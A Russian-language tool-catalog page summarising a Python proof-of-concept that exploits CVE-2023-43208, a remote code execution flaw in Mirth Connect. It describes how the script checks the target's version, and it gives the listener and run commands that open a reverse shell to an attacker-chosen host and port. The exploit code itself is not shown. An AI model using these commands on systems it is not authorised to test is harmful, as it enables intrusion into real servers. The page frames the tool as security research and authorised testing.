Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43208 — PoC для эксплуатации RCE CVE-2023-43208. | Kitploit
Инструменты/GitHubGitHub/predyy/cve-2023-43208
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubpredyy/cve-2023-43208

CVE-2023-43208

PoC для эксплуатации RCE CVE-2023-43208.

Репозиторий
115 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43208 Mirth Connect: PoC RCE

PoC-скрипт на Python, нацеленный на CVE-2023-43208 в Mirth Connect.

Disclaimer

Используйте только в средах, которыми вы владеете или для тестирования которых у вас есть явное разрешение. Этот репозиторий предназначен для исследований в области безопасности, проверки и защитного тестирования. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Обзор

exp.py — это версия PoC с минимальными зависимостями, которая:

  • Определяет, является ли цель экземпляром Mirth Connect
  • Запрашивает версию Mirth Connect по адресу /api/server/version
  • Проверяет, ниже ли версия 4.4.1
  • Отправляет XML-полезную нагрузку на /api/users, если цель выглядит уязвимой

По умолчанию скрипт использует HTTPS, переключиться на HTTP можно с помощью --http.

Использование

root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

Аргументы

  • -u, --url: целевой URL-адрес или хост Mirth Connect
  • -lh, --lhost: локальный хост/IP для обратного подключения
  • -lp, --lport: локальный порт для прослушивания
  • --http: принудительно использовать HTTP вместо HTTPS (по умолчанию используется HTTPS)

Пример

Сначала запустите слушатель:

root@kitploit:~
nc -lvnp 4444

Запустите скрипт:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

Для цели, работающей только по HTTP:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

Примечания

  • В скрипте отключена проверка SSL-сертификатов.
  • Перед отправкой полезной нагрузки скрипт запрашивает подтверждение.
  • Определение версии основано на семантическом сравнении с 4.4.1.
  • Цель, определённая как Mirth Connect, не гарантированно эксплуатируема (различия в сети, окружении и среде выполнения могут повлиять на результаты).

Благодарности

  • Первоначальное обнаружение уязвимости: IHTeam
  • Оригинальный код: K3ysTr0K3R и Chocapikk
  • Версия с минимальными зависимостями: predyy
Скачать инструмент